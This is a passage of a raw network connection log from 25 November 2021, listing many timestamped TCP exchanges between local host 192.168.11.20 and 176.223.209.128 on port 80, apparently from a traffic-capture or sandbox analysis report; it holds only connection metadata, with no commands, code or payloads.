                                              Nov 25, 2021 10:48:19.717742920 CET4986380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.719300985 CET4986380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.752773046 CET8049863176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.753021955 CET4986380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.786555052 CET8049863176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.804265976 CET8049863176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.804322958 CET8049863176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:19.804512978 CET4986380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.804567099 CET4986380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:19.838030100 CET8049863176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:20.319766998 CET4986480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:20.353235006 CET8049864176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:20.353384018 CET4986480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:20.354984999 CET4986480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:20.388293982 CET8049864176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:20.388570070 CET4986480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:20.421787977 CET8049864176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:20.438185930 CET8049864176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:20.438199997 CET8049864176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:20.438441992 CET4986480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:20.438456059 CET4986480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:20.471721888 CET8049864176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.002243996 CET4986580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.036319971 CET8049865176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.036617041 CET4986580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.038147926 CET4986580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.072262049 CET8049865176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.072483063 CET4986580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.106688023 CET8049865176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.125472069 CET8049865176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.125536919 CET8049865176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.125731945 CET4986580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.125824928 CET4986580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.160036087 CET8049865176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.730025053 CET4986680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.763473988 CET8049866176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.763731003 CET4986680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.765352011 CET4986680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.798700094 CET8049866176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.798989058 CET4986680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.832267046 CET8049866176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.848124981 CET8049866176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.848175049 CET8049866176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:21.848367929 CET4986680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.848423958 CET4986680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:21.881896019 CET8049866176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:22.429327965 CET4986780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:22.463098049 CET8049867176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:22.463284016 CET4986780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:22.464833975 CET4986780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:22.498703957 CET8049867176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:22.498878956 CET4986780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:22.533019066 CET8049867176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:22.549273968 CET8049867176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:22.549341917 CET8049867176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:22.549632072 CET4986780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:22.549730062 CET4986780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:22.583853960 CET8049867176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.095052958 CET4986980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.128371000 CET8049869176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.128602982 CET4986980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.130212069 CET4986980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.163573980 CET8049869176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.163805008 CET4986980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.197176933 CET8049869176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.214514017 CET8049869176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.214562893 CET8049869176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.214818001 CET4986980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.214873075 CET4986980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.248348951 CET8049869176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.690898895 CET4987080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.725095987 CET8049870176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.725290060 CET4987080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.726845980 CET4987080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.760822058 CET8049870176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.761006117 CET4987080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.795145988 CET8049870176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.811579943 CET8049870176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.811645985 CET8049870176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:23.811938047 CET4987080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.812035084 CET4987080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:23.846333027 CET8049870176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:24.378262043 CET4987180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:24.411689997 CET8049871176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:24.411976099 CET4987180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:24.413482904 CET4987180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:24.446791887 CET8049871176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:24.446990013 CET4987180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:24.480350018 CET8049871176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:24.498095989 CET8049871176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:24.498145103 CET8049871176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:24.498382092 CET4987180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:24.498431921 CET4987180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:24.532057047 CET8049871176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.044353008 CET4987280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.078480005 CET8049872176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.078694105 CET4987280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.080255032 CET4987280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.114427090 CET8049872176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.114614964 CET4987280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.148745060 CET8049872176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.168153048 CET8049872176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.168219090 CET8049872176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.168394089 CET4987280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.168457985 CET4987280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.202707052 CET8049872176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.745574951 CET4987380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.778976917 CET8049873176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.779320002 CET4987380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.780947924 CET4987380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.814291000 CET8049873176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.814433098 CET4987380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.848272085 CET8049873176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.867208958 CET8049873176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.867244959 CET8049873176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:25.867527008 CET4987380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.867587090 CET4987380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:25.900876045 CET8049873176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:26.376907110 CET4987480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:26.410856009 CET8049874176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:26.411382914 CET4987480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:26.412909985 CET4987480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:26.446697950 CET8049874176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:26.446912050 CET4987480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:26.480688095 CET8049874176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:26.499762058 CET8049874176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:26.499828100 CET8049874176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:26.500040054 CET4987480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:26.500092983 CET4987480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:26.534043074 CET8049874176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.047266006 CET4987580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.081378937 CET8049875176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.081640959 CET4987580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.083163977 CET4987580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.117276907 CET8049875176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.117561102 CET4987580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.151582003 CET8049875176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.176875114 CET8049875176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.176930904 CET8049875176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.177301884 CET4987580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.177386045 CET4987580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.211680889 CET8049875176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.658446074 CET4987680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.691744089 CET8049876176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.691930056 CET4987680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.693461895 CET4987680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.726810932 CET8049876176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.727015018 CET4987680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.760294914 CET8049876176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.784121037 CET8049876176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.784177065 CET8049876176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:27.784459114 CET4987680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.784540892 CET4987680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:27.818201065 CET8049876176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.238115072 CET4987780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.272106886 CET8049877176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.272254944 CET4987780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.273850918 CET4987780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.307915926 CET8049877176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.308095932 CET4987780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.342250109 CET8049877176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.358525038 CET8049877176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.358581066 CET8049877176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.358824968 CET4987780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.358889103 CET4987780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.393079042 CET8049877176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.823672056 CET4987880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.856802940 CET8049878176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.856914043 CET4987880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.858505011 CET4987880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.891932964 CET8049878176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.892165899 CET4987880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.925327063 CET8049878176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.941189051 CET8049878176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.941236973 CET8049878176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:28.941387892 CET4987880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.941436052 CET4987880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:28.974637985 CET8049878176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:29.401098967 CET4987980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:29.434408903 CET8049879176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:29.434748888 CET4987980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:29.436238050 CET4987980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:29.469357014 CET8049879176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:29.469530106 CET4987980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:29.502717972 CET8049879176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:29.519896030 CET8049879176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:29.519922972 CET8049879176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:29.520132065 CET4987980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:29.520154953 CET4987980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:29.553476095 CET8049879176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:29.920804024 CET4988080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:29.954997063 CET8049880176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:29.955240965 CET4988080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:29.956862926 CET4988080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:29.990829945 CET8049880176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:29.991008997 CET4988080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:30.025326014 CET8049880176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:30.042423010 CET8049880176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:30.042478085 CET8049880176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:30.042629004 CET4988080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:30.042695999 CET4988080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:30.077055931 CET8049880176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:30.582386971 CET4988180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:30.616730928 CET8049881176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:30.616981030 CET4988180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:30.618581057 CET4988180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:30.652554989 CET8049881176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:30.652806044 CET4988180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:30.687401056 CET8049881176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:30.704024076 CET8049881176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:30.704090118 CET8049881176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:30.704283953 CET4988180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:30.704380035 CET4988180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:30.738753080 CET8049881176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.195472002 CET4988280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.229465008 CET8049882176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.229696035 CET4988280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.231230021 CET4988280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.265162945 CET8049882176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.265408039 CET4988280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.299580097 CET8049882176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.317507029 CET8049882176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.317562103 CET8049882176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.317708015 CET4988280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.317790985 CET4988280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.352082014 CET8049882176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.796892881 CET4988380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.830260038 CET8049883176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.830409050 CET4988380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.831959963 CET4988380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.865200043 CET8049883176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.865540028 CET4988380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.898873091 CET8049883176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.919064045 CET8049883176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.919137955 CET8049883176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:31.919295073 CET4988380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.919353962 CET4988380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:31.952649117 CET8049883176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:32.400449038 CET4988480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:32.433923960 CET8049884176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:32.434089899 CET4988480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:32.435657024 CET4988480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:32.469024897 CET8049884176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:32.469261885 CET4988480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:32.502676010 CET8049884176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:32.519407034 CET8049884176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:32.519459963 CET8049884176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:32.519644022 CET4988480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:32.519696951 CET4988480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:32.553145885 CET8049884176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.052558899 CET4988580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.086685896 CET8049885176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.086937904 CET4988580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.088495016 CET4988580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.122658014 CET8049885176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.122982025 CET4988580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.157277107 CET8049885176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.174014091 CET8049885176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.174073935 CET8049885176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.174274921 CET4988580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.174338102 CET4988580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.208494902 CET8049885176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.704761028 CET4988680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.738205910 CET8049886176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.738404036 CET4988680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.744999886 CET4988680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.778490067 CET8049886176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.778672934 CET4988680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.812690020 CET8049886176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.827759027 CET8049886176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.827847958 CET8049886176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:33.828154087 CET4988680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.828253031 CET4988680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:33.861989975 CET8049886176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:34.307369947 CET4988780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:34.341396093 CET8049887176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:34.341675997 CET4988780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:34.343229055 CET4988780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:34.377239943 CET8049887176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:34.377456903 CET4988780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:34.411616087 CET8049887176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:34.427978992 CET8049887176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:34.428033113 CET8049887176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:34.428205967 CET4988780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:34.428263903 CET4988780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:34.462404966 CET8049887176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:34.906017065 CET4988880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:34.939934015 CET8049888176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:34.940124035 CET4988880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:34.941843033 CET4988880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:34.975893974 CET8049888176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:34.976138115 CET4988880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:35.010236979 CET8049888176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:35.026457071 CET8049888176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:35.026510000 CET8049888176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:35.026653051 CET4988880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:35.026706934 CET4988880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:35.060794115 CET8049888176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:35.506908894 CET4988980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:35.540335894 CET8049889176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:35.540621996 CET4988980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:35.542264938 CET4988980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:35.575679064 CET8049889176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:35.575865030 CET4988980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:35.609325886 CET8049889176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:35.624941111 CET8049889176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:35.624991894 CET8049889176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:35.625134945 CET4988980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:35.625186920 CET4988980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:35.658628941 CET8049889176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.168749094 CET4989080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.202838898 CET8049890176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.203123093 CET4989080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.204633951 CET4989080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.238612890 CET8049890176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.238786936 CET4989080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.272787094 CET8049890176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.296611071 CET8049890176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.296659946 CET8049890176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.296904087 CET4989080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.296952963 CET4989080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.331033945 CET8049890176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.785676003 CET4989180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.819159985 CET8049891176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.819339991 CET4989180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.820807934 CET4989180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.854130030 CET8049891176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.854347944 CET4989180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.887676954 CET8049891176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.904438019 CET8049891176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.904485941 CET8049891176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:36.904650927 CET4989180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.904699087 CET4989180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:36.938328028 CET8049891176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:37.434149981 CET4989280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:37.468044043 CET8049892176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:37.468225956 CET4989280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:37.469780922 CET4989280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:37.503554106 CET8049892176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:37.503727913 CET4989280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:37.537578106 CET8049892176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:37.553401947 CET8049892176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:37.553450108 CET8049892176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:37.553641081 CET4989280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:37.553689003 CET4989280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:37.587584972 CET8049892176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:37.970103025 CET4989380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:38.003257990 CET8049893176.223.209.128192.168.11.20
